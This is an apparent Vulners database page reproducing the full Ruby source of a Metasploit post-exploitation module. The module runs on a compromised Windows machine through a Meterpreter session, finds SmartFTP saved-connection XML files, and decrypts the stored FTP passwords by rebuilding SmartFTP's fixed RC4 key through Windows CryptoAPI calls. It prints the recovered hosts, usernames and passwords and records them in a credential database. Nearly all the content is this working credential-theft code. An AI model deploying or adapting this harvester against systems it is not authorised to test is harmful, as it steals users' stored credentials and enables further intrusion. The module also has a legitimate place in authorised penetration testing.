Lucene search
K

Windows Gather SmartFTP Saved Password Extraction

🗓️ 10 Aug 2011 17:48:30Reported by theLightCosine <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 37 Views

This module finds saved login credentials for the SmartFTP FTP client for windows. It finds the saved passwords and decrypts them

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather SmartFTP Saved Password Extraction',
        'Description' => %q{
          This module finds saved login credentials
          for the SmartFTP FTP client for windows.
          It finds the saved passwords and decrypts
          them.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_railgun_api
            ]
          }
        }
      )
    )
  end

  def run
    grab_user_profiles.each do |user|
      next if user['AppData'].nil?

      tmpath = user['AppData'] + '\\SmartFTP\\Client 2.0\\Favorites'

      enum_subdirs(tmpath).each do |xmlfile|
        xml = get_xml(xmlfile)

        unless xml.nil?
          # Will report the creds to DB and user
          parse_xml(xml)
        end
      end
    end
  end

  # The saved connections in SmartFTP are saved in XML files saved
  # in a Directory with user-defineable sub-directories. This
  # function recursively searches all sub directories for the XML files
  def enum_subdirs(path)
    xmlfiles = []

    begin
      session.fs.dir.foreach(path) do |sub|
        next if sub =~ /^(\.|\.\.|Predefined Favorites)$/

        xmlpath = "#{path}\\#{sub}"

        if sub =~ /\.xml$/
          xmlfiles << xmlpath
        else
          xmlfiles += enum_subdirs(xmlpath)
        end
      end
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error "Received error code #{e.code} when enumerating #{path}"
    end

    return xmlfiles
  end

  # We attempt to open the discovered XML files and alert the user if
  # we cannot access the file for any reason
  def get_xml(path)
    connections = client.fs.file.new(path, 'r')

    condata = ''
    condata << connections.read until connections.eof
    return condata
  rescue Rex::Post::Meterpreter::RequestError => e
    print_error "Received error code #{e.code} when reading #{path}"
    return nil
  end

  # Extracts the saved connection data from the XML. If no password
  # is saved, then we skip that connection. Reports the credentials
  # back to the database
  def parse_xml(data)
    mxml = REXML::Document.new(data).root
    mxml.elements.to_a('//FavoriteItem').each do |node|
      next if node.elements['Host'].nil?
      next if node.elements['User'].nil?
      next if node.elements['Password'].nil?

      host = node.elements['Host'].text
      port = node.elements['Port'].text
      user = node.elements['User'].text
      epassword = node.elements['Password'].text

      next if epassword.empty?

      pass = decrypt(epassword)

      print_good("HOST: #{host} PORT: #{port} USER: #{user} PASS: #{pass}")
      if session.db_record
        source_id = session.db_record.id
      else
        source_id = nil
      end
      service_data = {
        address: host,
        port: port,
        service_name: 'ftp',
        protocol: 'tcp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        private_type: :password,
        private_data: pass,
        username: user
      }

      credential_data.merge!(service_data)

      credential_core = create_credential(credential_data)
      login_data = {
        core: credential_core,
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      login_data.merge!(service_data)
      login = create_credential_login(login_data)
    end
  end

  # Hooks the Windows CryptoAPI libraries to decrypt the Passwords
  def decrypt(password)
    cipher = [password].pack('H*')
    ms_enhanced_prov = 'Microsoft Enhanced Cryptographic Provider v1.0'
    prov_rsa_full = 1
    crypt_verify_context = 0xF0000000
    alg_md5 = 32771
    alg_rc4 = 26625

    advapi32 = client.railgun.advapi32

    acquirecontext = advapi32.CryptAcquireContextW(4, nil, ms_enhanced_prov, prov_rsa_full, crypt_verify_context)
    createhash = advapi32.CryptCreateHash(acquirecontext['phProv'], alg_md5, 0, 0, 4)
    hashdata = advapi32.CryptHashData(createhash['phHash'], 'SmartFTP', 16, 0)
    derivekey = advapi32.CryptDeriveKey(acquirecontext['phProv'], alg_rc4, createhash['phHash'], 0x00800000, 4)
    decrypted = advapi32.CryptDecrypt(derivekey['phKey'], 0, true, 0, cipher, cipher.length)
    destroyhash = advapi32.CryptDestroyHash(createhash['phHash'])
    destroykey = advapi32.CryptDestroyKey(derivekey['phKey'])
    releasecontext = advapi32.CryptReleaseContext(acquirecontext['phProv'], 0)

    data = decrypted['pbData']
    data.gsub!(/\x00/, '')
    return data
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation